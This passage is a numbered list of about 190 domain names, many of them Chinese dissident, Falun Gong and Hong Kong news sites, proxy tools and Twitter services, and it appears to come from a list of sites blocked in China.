loiclemeur.com 2293 | bfnn.org 2294 | faiththedog.info 2295 | gtap.googlecode.com 2296 | picidae.net 2297 | epochweekly.com 2298 | free-gate.org 2299 | freelotto.com 2300 | himemix.com 2301 | tweetree.com 2302 | rfachina.com 2303 | truthcn.com 2304 | xcity.jp 2305 | newsancai.com 2306 | game735.com 2307 | caochangqing.com 2308 | liberal.org.hk 2309 | mrtweet.com 2310 | gamez.com.tw 2311 | qi-gong.me 2312 | steel-storm.com 2313 | turntable.fm 2314 | couchdbwiki.com 2315 | flecheinthepeche.fr 2316 | swift-tools.net 2317 | mmaaxx.com 2318 | fdc89.jp 2319 | emory.edu 2320 | eic-av.com 2321 | topsy.com 2322 | kyohk.net 2323 | pose.com 2324 | neolee.cn 2325 | edicypages.com 2326 | designerol.com 2327 | knowledgerush.com 2328 | ebookee.com 2329 | so-news.com 2330 | mthruf.com 2331 | getfoxyproxy.org 2332 | pathtosharepoint.com 2333 | logiqx.com 2334 | doxygen.org 2335 | say2.info 2336 | deutsche-welle.de 2337 | dabr.mobi 2338 | catch22.net 2339 | digitalnomadsproject.org 2340 | github.com 2341 | blogspot.de 2342 | pcdvd.com.tw 2343 | getyouram.com 2344 | compileheart.com 2345 | hidden-advent.org 2346 | megaporn.com 2347 | hougaige.com 2348 | aboutgfw.com 2349 | comefromchina.com 2350 | e-spacy.com 2351 | funf.tw 2352 | worldjournal.com 2353 | olumpo.com 2354 | finler.net 2355 | zoozle.net 2356 | vcf-online.org 2357 | wikimedia.org.mo 2358 | de-sci.org 2359 | stuffimreading.net 2360 | state168.com 2361 | cantonese.asia 2362 | fzh999.com 2363 | ipobar.com 2364 | topshareware.com 2365 | pokerstars.com 2366 | bloomberg.cn 2367 | qstatus.com 2368 | muzi.com 2369 | syx86.cn 2370 | changp.com 2371 | techparaiso.com 2372 | posterous.com 2373 | interfaceaddiction.com 2374 | cnitter.com 2375 | chinaaid.net 2376 | fscked.org 2377 | storagenewsletter.com 2378 | guishan.org 2379 | christusrex.org 2380 | syncback.com 2381 | tweetboard.com 2382 | powerpointninja.com 2383 | orient-doll.com 2384 | navicat.com 2385 | twittercounter.com 2386 | git-scm.com 2387 | martau.com 2388 | inmediahk.net 2389 | aliengu.com 2390 | taweet.com 2391 | 0to255.com 2392 | duping.net 2393 | tkcs-collins.com 2394 | trustedbi.com 2395 | nighost.org 2396 | babynet.com.hk 2397 | mmdays.com 2398 | appspot.com 2399 | dollf.com 2400 | epochtimestr.com 2401 | hellonewyork.us 2402 | 1eew.com 2403 | taiwannation.com 2404 | wezhiyong.org 2405 | csuchen.de 2406 | wahas.com 2407 | lookingglasstheatre.org 2408 | furinkan.com 2409 | observechina.net 2410 | chinachannel.hk 2411 | sysresccd.org 2412 | meetup.com 2413 | renyurenquan.org 2414 | chinese-memorial.org 2415 | canyu.org 2416 | jgoodies.com 2417 | china-week.com 2418 | pureconcepts.net 2419 | sowiki.net 2420 | kangye.org 2421 | br.st 2422 | yfrog.com 2423 | msn.com.tw 2424 | mingpao.com 2425 | crd-net.org 2426 | hk 2427 | googleapis.com 2428 | ydy.com 2429 | bipic.net 2430 | tibet.com 2431 | naitik.net 2432 | cuihua.org 2433 | gs-discuss.com 2434 | diaoyuislands.org 2435 | wozy.in 2436 | xthost.info 2437 | myopenid.com 2438 | hkdailynews.com.hk 2439 | glennhilton.com 2440 | christianstudy.com 2441 | freenetproject.org 2442 | ebookbrowse.com 2443 | gaoming.net 2444 | madmenunbuttoned.com 2445 | laptoplockdown.com 2446 | freakshare.com 2447 | e-traderland.net 2448 | twtrland.com 2449 | huhaitai.com 2450 | askstudent.com 2451 | yipub.com 2452 | truveo.com 2453 | tabtter.jp 2454 | franklc.com 2455 | weigegebyc.dreamhosters.com 2456 | iblogserv-f.net 2457 | kanzhongguo.eu 2458 | freewebs.com 2459 | ig.com.br 2460 | dwheeler.com 2461 | famunion.com 2462 | 173ng.com 2463 | minghui.org 2464 | isaacmao.com 2465 | perfectvpn.net 2466 | freeman2.com 2467 | sinonet.ca 2468 | jpopforum.net 2469 | sobees.com 2470 | free4u.com.ar 2471 | oyax.com 2472 | littlebigdetails.com 2473 | mingjingnews.com 2474 | sharkdolphin.com 2475 | limiao.net 2476 | jimoparty.com 2477 | assembla.com 2478 | dribbble.com 2479 | njactb.org 2480 | twiggit.org 2481 | lookatgame.com 2482 | darpa.mil 2483 | wtfpeople.com 2484 | 1-apple.com.tw 2485 | --------------------------------------------------------------------------------